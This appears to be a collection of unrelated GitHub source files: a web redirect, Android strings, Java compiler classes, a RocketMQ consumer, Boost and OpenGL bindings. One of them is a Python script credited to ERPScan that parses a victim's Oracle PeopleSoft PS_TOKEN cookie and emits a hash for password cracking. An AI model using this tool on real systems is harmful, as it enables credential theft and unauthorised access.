text
stringlengths 2
99.9k
| meta
dict |
---|---|
<!DOCTYPE html>
<html lang="en">
<head>
<!-- charset must come first in <head>, before the refresh directive -->
<meta charset="utf-8">
<title>Redirecting to ../../libc/type.in_port_t.html</title>
<meta http-equiv="refresh" content="0;URL=../../libc/type.in_port_t.html">
</head>
<body>
<p>Redirecting to <a href="../../libc/type.in_port_t.html">../../libc/type.in_port_t.html</a>...</p>
<script>location.replace("../../libc/type.in_port_t.html" + location.search + location.hash);</script>
</body>
</html> | {
"pile_set_name": "Github"
} |
#!/usr/bin/python
# NOTE(review): Python 2 only -- relies on print statements and
# str.encode('hex'), both of which were removed in Python 3.
import base64
import hashlib
import argparse
import zlib
import sys
# Use "generate.py from https://erpscan.com/wp-content/uploads/tools/ERPScan-tockenchpoken.zip
# to generate sample PS_TOKEN cookies.
print "Based on tokenchpoken v0.5 beta's parse.py file"
print 'Oracle PS_TOKEN cracker. Token parser'
print
print 'Alexey Tyurin - a.tyurin at erpscan.com'
print 'ERPScan Research Group - http://www.erpscan.com'
print
parser = argparse.ArgumentParser()
parser.add_argument('-c', action='store', dest='cookie', required=True,
                    help='Set a victim\'s PS_TOKEN cookie for parsing')
args = parser.parse_args()
# NOTE(review): 'input' shadows the builtin of the same name; harmless here
# since the builtin is never used afterwards, but worth renaming.
input = args.cookie
# The cookie is a base64-encoded binary PS_TOKEN blob.
full_str = base64.b64decode(input)
# Bytes 44:64 carry the 20-byte MAC embedded in the token (hex-encoded here);
# the comparison with hashlib.sha1 below shows it is a SHA-1 digest.
# The zlib-compressed payload starts at offset 76.
sha_mac = full_str[44:64].encode('hex')
inflate_data = full_str[76:]
data = zlib.decompress(inflate_data)
# parsing of compressed data
data_hash = hashlib.sha1(data).hexdigest()
# Byte 20 of the decompressed payload holds the length of the user-name field
# that follows at offset 21. The "\x00" strip drops what look like UTF-16
# padding bytes -- assumption; confirm against generate.py's encoder.
user_length = data[20]
loc = 21
user = data[loc:loc + int(user_length.encode('hex'), 16)].replace("\x00", "")
# python generate.py -e 0 -u PS -l ENG -p "" -n PSFT_HR -d 2015-07-01-08.06.46
# If SHA-1(payload) equals the embedded MAC the node password is empty;
# otherwise emit a John-the-Ripper "dynamic_1600" hash line for cracking.
if data_hash == sha_mac:
    print "%s: there is no password for the attacking node!" % user
else:
    # print hash
    sys.stdout.write("%s:$dynamic_1600$%s$HEX$%s\n" % (user, sha_mac,
        data.encode("hex")))
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!--
/* //device/apps/common/assets/res/any/strings.xml
**
** Copyright 2006, The Android Open Source Project
**
** Licensed under the Apache License, Version 2.0 (the "License");
** you may not use this file except in compliance with the License.
** You may obtain a copy of the License at
**
** http://www.apache.org/licenses/LICENSE-2.0
**
** Unless required by applicable law or agreed to in writing, software
** distributed under the License is distributed on an "AS IS" BASIS,
** WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
** See the License for the specific language governing permissions and
** limitations under the License.
*/
-->
<resources>
<string msgid="735082772341716043" name="fingerprint_acquired_partial">"Odcisk palca został odczytany tylko częściowo. Spróbuj ponownie."</string>
<string msgid="4596546021310923214" name="fingerprint_acquired_insufficient">"Nie udało się przetworzyć odcisku palca. Spróbuj ponownie."</string>
<string msgid="1087209702421076105" name="fingerprint_acquired_imager_dirty">"Czytnik linii papilarnych jest zabrudzony. Wyczyść go i spróbuj ponownie."</string>
<string msgid="6470642383109155969" name="fingerprint_acquired_too_fast">"Palec został podniesiony zbyt wcześnie. Spróbuj jeszcze raz."</string>
<string msgid="59250885689661653" name="fingerprint_acquired_too_slow">"Palec został obrócony zbyt wolno. Spróbuj ponownie."</string>
<string msgid="7955921658939936596" name="fingerprint_error_hw_not_available">"Czytnik linii papilarnych nie jest dostępny."</string>
<string msgid="1055819001126053318" name="fingerprint_error_no_space">"Nie można zapisać odcisku palca. Usuń istniejący odcisk palca."</string>
<string msgid="3927186043737732875" name="fingerprint_error_timeout">"Osiągnięto limit czasu odczytu linii papilarnych. Spróbuj ponownie."</string>
<string msgid="4402024612660774395" name="fingerprint_error_canceled">"Odczyt odcisku palca został anulowany."</string>
<string msgid="5536934748136933450" name="fingerprint_error_lockout">"Zbyt wiele prób. Spróbuj ponownie później."</string>
<string msgid="6107816084103552441" name="fingerprint_error_unable_to_process">"Spróbuj ponownie."</string>
<string msgid="4516019619850763049" name="fingerprints">"Odciski cyfrowe:"</string>
<string name="fingerprint_not_recognized" msgid="2690661881608146617">"Nie rozpoznano odcisku palca."</string>
</resources> | {
"pile_set_name": "Github"
} |
{
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CustomMessage.message - tock</title>
<link rel="stylesheet" href="../../../style.css">
</head>
<body>
<a href="../../index.html">tock</a> / <a href="../index.html">ai.tock.bot.api.model.message.bot</a> / <a href="index.html">CustomMessage</a> / <a href="./message.html">message</a><br/>
<br/>
<h1>message</h1>
<a name="ai.tock.bot.api.model.message.bot.CustomMessage$message"></a>
<code><span class="keyword">val </span><span class="identifier">message</span><span class="symbol">: </span><a href="../../ai.tock.shared.jackson/-constrained-value-wrapper/index.html"><span class="identifier">ConstrainedValueWrapper</span></a><span class="symbol"><</span><span class="keyword">out</span> <a href="../../ai.tock.bot.connector/-connector-message/index.html"><span class="identifier">ConnectorMessage</span></a><span class="symbol">></span></code> <a href="https://github.com/theopenconversationkit/tock/blob/master/bot/api/model/src/main/kotlin/message/bot/CustomMessage.kt#L23">(source)</a>
</body>
</html>
| {
"pile_set_name": "Github"
} |
import DS from "ember-data";
import cardColor from "../utils/card-color";
export default DS.Model.extend({
  name: DS.attr('string'),
  icon: DS.attr('string'),
  policy: DS.attr('number'),
  ports: DS.attr(),
  type: DS.attr('string'),

  // Accent colour for this service's card; no dependent keys, so it is
  // computed once on first access and cached thereafter.
  cardColor: function() {
    return cardColor();
  }.property(),

  // Human-readable port list, e.g. "http (80), https (443)".
  // Each entry of `ports` is a [proto, port]-style pair.
  displayPorts: function() {
    return this.get('ports').map(function(pair) {
      return pair[1] + " (" + pair[0] + ")";
    }).join(", ");
  }.property('ports'),

  // Semantic-UI icon name matching the firewall policy value.
  policyDisplayIcon: function() {
    switch (this.get('policy')) {
      case 0:  return "minus circle";
      case 1:  return "home";
      case 2:  return "check circle";
      default: return "";
    }
  }.property('policy'),

  // User-facing label for the firewall policy value.
  policyDisplayText: function() {
    switch (this.get('policy')) {
      case 0:  return "Deny All Connections";
      case 1:  return "Local Networks Only";
      case 2:  return "Allow All Connections";
      default: return "Unknown Policy";
    }
  }.property('policy'),

  // CSS colour class for the policy label (red = denied, green = open).
  policyDisplayClass: function() {
    switch (this.get('policy')) {
      case 0:  return "text red";
      case 2:  return "text green";
      default: return "text black";
    }
  }.property('policy'),

  // Convenience negations used by templates to show/hide policy actions.
  notWideOpen: function() {
    return this.get('policy') !== 2;
  }.property('policy'),

  notLocal: function() {
    return this.get('policy') !== 1;
  }.property('policy'),

  notDenied: function() {
    return this.get('policy') !== 0;
  }.property('policy'),

  // Built-in "arkos" services must stay reachable and cannot be denied.
  canDeny: function() {
    return this.get('type') !== "arkos";
  }.property('type'),

  isCustomPolicy: function() {
    return this.get('type') === "custom";
  }.property('type'),

  isReady: DS.attr('boolean', {defaultValue: false})
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2007 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package external.com.android.dx.rop.code;
import external.com.android.dx.rop.type.StdTypeList;
import external.com.android.dx.rop.type.Type;
import external.com.android.dx.rop.type.TypeList;
import external.com.android.dx.util.ToHuman;
/**
* A register-based instruction. An instruction is the combination of
* an opcode (which specifies operation and source/result types), a
* list of actual sources and result registers/values, and additional
* information.
*/
public abstract class Insn implements ToHuman {
/** {@code non-null;} opcode */
private final Rop opcode;
/** {@code non-null;} source position */
private final SourcePosition position;
/** {@code null-ok;} spec for the result of this instruction, if any */
private final RegisterSpec result;
/** {@code non-null;} specs for all the sources of this instruction */
private final RegisterSpecList sources;
/**
* Constructs an instance.
*
* @param opcode {@code non-null;} the opcode
* @param position {@code non-null;} source position
* @param result {@code null-ok;} spec for the result, if any
* @param sources {@code non-null;} specs for all the sources
*/
public Insn(Rop opcode, SourcePosition position, RegisterSpec result,
RegisterSpecList sources) {
if (opcode == null) {
throw new NullPointerException("opcode == null");
}
if (position == null) {
throw new NullPointerException("position == null");
}
if (sources == null) {
throw new NullPointerException("sources == null");
}
this.opcode = opcode;
this.position = position;
this.result = result;
this.sources = sources;
}
/**
* {@inheritDoc}
*
* Instances of this class compare by identity. That is,
* {@code x.equals(y)} is only true if {@code x == y}.
*/
@Override
public final boolean equals(Object other) {
return (this == other);
}
/**
* {@inheritDoc}
*
* This implementation returns the identity hashcode of this
* instance. This is proper, since instances of this class compare
* by identity (see {@link #equals}).
*/
@Override
public final int hashCode() {
return System.identityHashCode(this);
}
/** {@inheritDoc} */
@Override
public String toString() {
return toStringWithInline(getInlineString());
}
/**
* Gets a human-oriented (and slightly lossy) string for this instance.
*
* @return {@code non-null;} the human string form
*/
@Override
public String toHuman() {
return toHumanWithInline(getInlineString());
}
/**
* Gets an "inline" string portion for toHuman(), if available. This
* is the portion that appears after the Rop opcode
*
* @return {@code null-ok;} if non-null, the inline text for toHuman()
*/
public String getInlineString() {
return null;
}
/**
* Gets the opcode.
*
* @return {@code non-null;} the opcode
*/
public final Rop getOpcode() {
return opcode;
}
/**
* Gets the source position.
*
* @return {@code non-null;} the source position
*/
public final SourcePosition getPosition() {
return position;
}
/**
* Gets the result spec, if any. A return value of {@code null}
* means this instruction returns nothing.
*
* @return {@code null-ok;} the result spec, if any
*/
public final RegisterSpec getResult() {
return result;
}
/**
* Gets the spec of a local variable assignment that occurs at this
* instruction, or null if no local variable assignment occurs. This
* may be the result register, or for {@code mark-local} insns
* it may be the source.
*
* @return {@code null-ok;} a named register spec or null
*/
public final RegisterSpec getLocalAssignment() {
RegisterSpec assignment;
if (opcode.getOpcode() == RegOps.MARK_LOCAL) {
assignment = sources.get(0);
} else {
assignment = result;
}
if (assignment == null) {
return null;
}
LocalItem localItem = assignment.getLocalItem();
if (localItem == null) {
return null;
}
return assignment;
}
/**
* Gets the source specs.
*
* @return {@code non-null;} the source specs
*/
public final RegisterSpecList getSources() {
return sources;
}
/**
* Gets whether this instruction can possibly throw an exception. This
* is just a convenient wrapper for {@code getOpcode().canThrow()}.
*
* @return {@code true} iff this instruction can possibly throw
*/
public final boolean canThrow() {
return opcode.canThrow();
}
/**
* Gets the list of possibly-caught exceptions. This returns {@link
* StdTypeList#EMPTY} if this instruction has no handlers,
* which can be <i>either</i> if this instruction can't possibly
* throw or if it merely doesn't handle any of its possible
* exceptions. To determine whether this instruction can throw,
* use {@link #canThrow}.
*
* @return {@code non-null;} the catches list
*/
public abstract TypeList getCatches();
/**
* Calls the appropriate method on the given visitor, depending on the
* class of this instance. Subclasses must override this.
*
* @param visitor {@code non-null;} the visitor to call on
*/
public abstract void accept(Visitor visitor);
/**
* Returns an instance that is just like this one, except that it
* has a catch list with the given item appended to the end. This
* method throws an exception if this instance can't possibly
* throw. To determine whether this instruction can throw, use
* {@link #canThrow}.
*
* @param type {@code non-null;} type to append to the catch list
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withAddedCatch(Type type);
/**
* Returns an instance that is just like this one, except that all
* register references have been offset by the given delta.
*
* @param delta the amount to offset register references by
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withRegisterOffset(int delta);
/**
* Returns an instance that is just like this one, except that, if
* possible, the insn is converted into a version in which a source
* (if it is a constant) is represented directly rather than as a
* register reference. {@code this} is returned in cases where the
* translation is not possible.
*
* @return {@code non-null;} an appropriately-constructed instance
*/
public Insn withSourceLiteral() {
return this;
}
/**
* Returns an exact copy of this Insn
*
* @return {@code non-null;} an appropriately-constructed instance
*/
public Insn copy() {
return withRegisterOffset(0);
}
/**
* Compares, handling nulls safely
*
* @param a first object
* @param b second object
* @return true if they're equal or both null.
*/
private static boolean equalsHandleNulls (Object a, Object b) {
return (a == b) || ((a != null) && a.equals(b));
}
/**
* Compares Insn contents, since {@code Insn.equals()} is defined
* to be an identity compare. Insn's are {@code contentEquals()}
* if they have the same opcode, registers, source position, and other
* metadata.
*
* @return true in the case described above
*/
public boolean contentEquals(Insn b) {
return opcode == b.getOpcode()
&& position.equals(b.getPosition())
&& (getClass() == b.getClass())
&& equalsHandleNulls(result, b.getResult())
&& equalsHandleNulls(sources, b.getSources())
&& StdTypeList.equalContents(getCatches(), b.getCatches());
}
/**
* Returns an instance that is just like this one, except
* with new result and source registers.
*
* @param result {@code null-ok;} new result register
* @param sources {@code non-null;} new sources registers
* @return {@code non-null;} an appropriately-constructed instance
*/
public abstract Insn withNewRegisters(RegisterSpec result,
RegisterSpecList sources);
/**
* Returns the string form of this instance, with the given bit added in
* the standard location for an inline argument.
*
* @param extra {@code null-ok;} the inline argument string
* @return {@code non-null;} the string form
*/
protected final String toStringWithInline(String extra) {
StringBuilder sb = new StringBuilder(80);
sb.append("Insn{");
sb.append(position);
sb.append(' ');
sb.append(opcode);
if (extra != null) {
sb.append(' ');
sb.append(extra);
}
sb.append(" :: ");
if (result != null) {
sb.append(result);
sb.append(" <- ");
}
sb.append(sources);
sb.append('}');
return sb.toString();
}
/**
* Returns the human string form of this instance, with the given
* bit added in the standard location for an inline argument.
*
* @param extra {@code null-ok;} the inline argument string
* @return {@code non-null;} the human string form
*/
protected final String toHumanWithInline(String extra) {
StringBuilder sb = new StringBuilder(80);
sb.append(position);
sb.append(": ");
sb.append(opcode.getNickname());
if (extra != null) {
sb.append("(");
sb.append(extra);
sb.append(")");
}
if (result == null) {
sb.append(" .");
} else {
sb.append(" ");
sb.append(result.toHuman());
}
sb.append(" <-");
int sz = sources.size();
if (sz == 0) {
sb.append(" .");
} else {
for (int i = 0; i < sz; i++) {
sb.append(" ");
sb.append(sources.get(i).toHuman());
}
}
return sb.toString();
}
/**
* Visitor interface for this (outer) class.
*/
public static interface Visitor {
/**
* Visits a {@link PlainInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitPlainInsn(PlainInsn insn);
/**
* Visits a {@link PlainCstInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitPlainCstInsn(PlainCstInsn insn);
/**
* Visits a {@link SwitchInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitSwitchInsn(SwitchInsn insn);
/**
* Visits a {@link ThrowingCstInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitThrowingCstInsn(ThrowingCstInsn insn);
/**
* Visits a {@link ThrowingInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitThrowingInsn(ThrowingInsn insn);
/**
* Visits a {@link FillArrayDataInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitFillArrayDataInsn(FillArrayDataInsn insn);
/**
* Visits a {@link InvokePolymorphicInsn}.
*
* @param insn {@code non-null;} the instruction to visit
*/
public void visitInvokePolymorphicInsn(InvokePolymorphicInsn insn);
}
/**
* Base implementation of {@link Visitor}, which has empty method
* bodies for all methods.
*/
public static class BaseVisitor implements Visitor {
/** {@inheritDoc} */
@Override
public void visitPlainInsn(PlainInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitPlainCstInsn(PlainCstInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitSwitchInsn(SwitchInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitThrowingCstInsn(ThrowingCstInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitThrowingInsn(ThrowingInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitFillArrayDataInsn(FillArrayDataInsn insn) {
// This space intentionally left blank.
}
/** {@inheritDoc} */
@Override
public void visitInvokePolymorphicInsn(InvokePolymorphicInsn insn) {
// This space intentionally left blank.
}
}
}
| {
"pile_set_name": "Github"
} |
{
"name": "objc-codegenutils",
"full_name": "objc-codegenutils",
"oldname": null,
"aliases": [
],
"versioned_formulae": [
],
"desc": "Three small tools to help work with Xcode",
"license": "Apache-2.0",
"homepage": "https://github.com/square/objc-codegenutils",
"versions": {
"stable": "1.0",
"head": "HEAD",
"bottle": true
},
"urls": {
"stable": {
"url": "https://github.com/square/objc-codegenutils/archive/v1.0.tar.gz",
"tag": null,
"revision": null
}
},
"revision": 0,
"version_scheme": 0,
"bottle": {
"stable": {
"rebuild": 0,
"cellar": ":any_skip_relocation",
"prefix": "/home/linuxbrew/.linuxbrew",
"root_url": "https://linuxbrew.bintray.com/bottles",
"files": {
"catalina": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.catalina.bottle.tar.gz",
"sha256": "24745ae53d47e15598835ee0538c3f121c48b31b21902b1fd3fab0a8c9886543"
},
"mojave": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.mojave.bottle.tar.gz",
"sha256": "7a10354a20ef417eeb521c983f4714be063b68e6d74bec7ddf6f72b99d3cbfbe"
},
"high_sierra": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.high_sierra.bottle.tar.gz",
"sha256": "118c03e858a60fa17c71fbc84fb5a8b9c5f778a0c68531e3df576e1d85d9c91a"
},
"sierra": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.sierra.bottle.tar.gz",
"sha256": "d7b3d3d26970add3af78b0820f3ef8b5e0290f1b2114f5bf06acddcd8d6bdb34"
},
"el_capitan": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.el_capitan.bottle.tar.gz",
"sha256": "d7b945db595b07ee5677902586e01002ba555affdcae366f1fcbe919a6013772"
},
"mavericks": {
"url": "https://linuxbrew.bintray.com/bottles/objc-codegenutils-1.0.mavericks.bottle.tar.gz",
"sha256": "46d389e6ec12462dfbdd97822ce7c6e8156bbe9fac7a3baf04c20cb1991d9f75"
}
}
}
},
"keg_only": false,
"bottle_disabled": false,
"options": [
],
"build_dependencies": [
],
"dependencies": [
],
"recommended_dependencies": [
],
"optional_dependencies": [
],
"uses_from_macos": [
],
"requirements": [
],
"conflicts_with": [
],
"caveats": null,
"installed": [
],
"linked_keg": null,
"pinned": false,
"outdated": false,
"deprecated": false,
"disabled": false
}
| {
"pile_set_name": "Github"
} |
// Copyright Aleksey Gurtovoy 2000-2004
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
//
// Preprocessed version of "boost/mpl/or.hpp" header
// -- DO NOT modify by hand!
namespace boost { namespace mpl {
namespace aux {
template< bool C_, typename T1, typename T2, typename T3, typename T4 >
struct or_impl
: true_
{
};
template< typename T1, typename T2, typename T3, typename T4 >
struct or_impl< false,T1,T2,T3,T4 >
: or_impl<
BOOST_MPL_AUX_NESTED_TYPE_WKND(T1)::value
, T2, T3, T4
, false_
>
{
};
template<>
struct or_impl<
false
, false_, false_, false_, false_
>
: false_
{
};
} // namespace aux
template<
typename BOOST_MPL_AUX_NA_PARAM(T1)
, typename BOOST_MPL_AUX_NA_PARAM(T2)
, typename T3 = false_, typename T4 = false_, typename T5 = false_
>
struct or_
: aux::or_impl<
BOOST_MPL_AUX_NESTED_TYPE_WKND(T1)::value
, T2, T3, T4, T5
>
{
BOOST_MPL_AUX_LAMBDA_SUPPORT(
5
, or_
, ( T1, T2, T3, T4, T5)
)
};
BOOST_MPL_AUX_NA_SPEC2(
2
, 5
, or_
)
}}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.rocketmq.example.ordermessage;
import java.util.List;
import java.util.concurrent.atomic.AtomicLong;
import org.apache.rocketmq.client.consumer.DefaultMQPushConsumer;
import org.apache.rocketmq.client.consumer.listener.ConsumeOrderlyContext;
import org.apache.rocketmq.client.consumer.listener.ConsumeOrderlyStatus;
import org.apache.rocketmq.client.consumer.listener.MessageListenerOrderly;
import org.apache.rocketmq.client.exception.MQClientException;
import org.apache.rocketmq.common.consumer.ConsumeFromWhere;
import org.apache.rocketmq.common.message.MessageExt;
/**
 * RocketMQ example: an orderly (per-queue in-order) push consumer that
 * demonstrates every possible {@link ConsumeOrderlyStatus} outcome by
 * rotating return values based on a batch counter.
 */
public class Consumer {

    public static void main(String[] args) throws MQClientException {
        DefaultMQPushConsumer consumer = new DefaultMQPushConsumer("please_rename_unique_group_name_3");
        // Start from the earliest available offset the first time this group runs.
        consumer.setConsumeFromWhere(ConsumeFromWhere.CONSUME_FROM_FIRST_OFFSET);
        consumer.subscribe("TopicTest", "TagA || TagC || TagD");
        consumer.registerMessageListener(new MessageListenerOrderly() {
            // Counts consumed batches; drives the demo's rotating statuses below.
            AtomicLong consumeTimes = new AtomicLong(0);

            @Override
            public ConsumeOrderlyStatus consumeMessage(List<MessageExt> msgs, ConsumeOrderlyContext context) {
                context.setAutoCommit(true);
                System.out.printf("%s Receive New Messages: %s %n", Thread.currentThread().getName(), msgs);
                this.consumeTimes.incrementAndGet();
                // Demo only: cycle through the orderly-consume outcomes.
                // Checks run in order, so e.g. a count divisible by 6 hits the
                // "% 2" branch first and returns SUCCESS.
                if ((this.consumeTimes.get() % 2) == 0) {
                    return ConsumeOrderlyStatus.SUCCESS;
                } else if ((this.consumeTimes.get() % 3) == 0) {
                    return ConsumeOrderlyStatus.ROLLBACK;
                } else if ((this.consumeTimes.get() % 4) == 0) {
                    return ConsumeOrderlyStatus.COMMIT;
                } else if ((this.consumeTimes.get() % 5) == 0) {
                    // Suspend this queue for 3s, then redeliver the same batch.
                    context.setSuspendCurrentQueueTimeMillis(3000);
                    return ConsumeOrderlyStatus.SUSPEND_CURRENT_QUEUE_A_MOMENT;
                }
                return ConsumeOrderlyStatus.SUCCESS;
            }
        });
        consumer.start();
        System.out.printf("Consumer Started.%n");
    }
}
| {
"pile_set_name": "Github"
} |
// MIT License
//
// Copyright (c) 2009-2017 Luca Piccioni
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
//
// This file is automatically generated
#pragma warning disable 649, 1572, 1573
// ReSharper disable RedundantUsingDirective
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security;
using System.Text;
using Khronos;
// ReSharper disable CheckNamespace
// ReSharper disable InconsistentNaming
// ReSharper disable JoinDeclarationAndInitializer
namespace OpenGL
{
public partial class Gl
{
/// <summary>
/// [GL] Value of GL_TEXTURE_SPARSE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int TEXTURE_SPARSE_ARB = 0x91A6;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_INDEX_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int VIRTUAL_PAGE_SIZE_INDEX_ARB = 0x91A7;
/// <summary>
/// [GL] Value of GL_NUM_SPARSE_LEVELS_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int NUM_SPARSE_LEVELS_ARB = 0x91AA;
/// <summary>
/// [GL] Value of GL_NUM_VIRTUAL_PAGE_SIZES_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int NUM_VIRTUAL_PAGE_SIZES_ARB = 0x91A8;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_X_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_X_ARB = 0x9195;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_Y_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_Y_ARB = 0x9196;
/// <summary>
/// [GL] Value of GL_VIRTUAL_PAGE_SIZE_Z_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int VIRTUAL_PAGE_SIZE_Z_ARB = 0x9197;
/// <summary>
/// [GL] Value of GL_MAX_SPARSE_TEXTURE_SIZE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int MAX_SPARSE_TEXTURE_SIZE_ARB = 0x9198;
/// <summary>
/// [GL] Value of GL_MAX_SPARSE_3D_TEXTURE_SIZE_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[RequiredByFeature("GL_AMD_sparse_texture")]
public const int MAX_SPARSE_3D_TEXTURE_SIZE_ARB = 0x9199;
/// <summary>
/// [GL] Value of GL_SPARSE_TEXTURE_FULL_ARRAY_CUBE_MIPMAPS_ARB symbol.
/// </summary>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public const int SPARSE_TEXTURE_FULL_ARRAY_CUBE_MIPMAPS_ARB = 0x91A9;
/// <summary>
/// [GL] glTexPageCommitmentARB: Binding for glTexPageCommitmentARB.
/// </summary>
/// <param name="target">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="level">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="xoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="yoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="zoffset">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="width">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="height">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="depth">
/// A <see cref="T:int"/>.
/// </param>
/// <param name="commit">
/// A <see cref="T:bool"/>.
/// </param>
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
public static void TexPageCommitmentARB(int target, int level, int xoffset, int yoffset, int zoffset, int width, int height, int depth, bool commit)
{
Debug.Assert(Delegates.pglTexPageCommitmentARB != null, "pglTexPageCommitmentARB not implemented");
Delegates.pglTexPageCommitmentARB(target, level, xoffset, yoffset, zoffset, width, height, depth, commit);
LogCommand("glTexPageCommitmentARB", null, target, level, xoffset, yoffset, zoffset, width, height, depth, commit );
DebugCheckErrors(null);
}
internal static unsafe partial class Delegates
{
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2")]
[SuppressUnmanagedCodeSecurity]
internal delegate void glTexPageCommitmentARB(int target, int level, int xoffset, int yoffset, int zoffset, int width, int height, int depth, [MarshalAs(UnmanagedType.I1)] bool commit);
[RequiredByFeature("GL_ARB_sparse_texture", Api = "gl|glcore")]
[RequiredByFeature("GL_EXT_sparse_texture", Api = "gles2", EntryPoint = "glTexPageCommitmentEXT")]
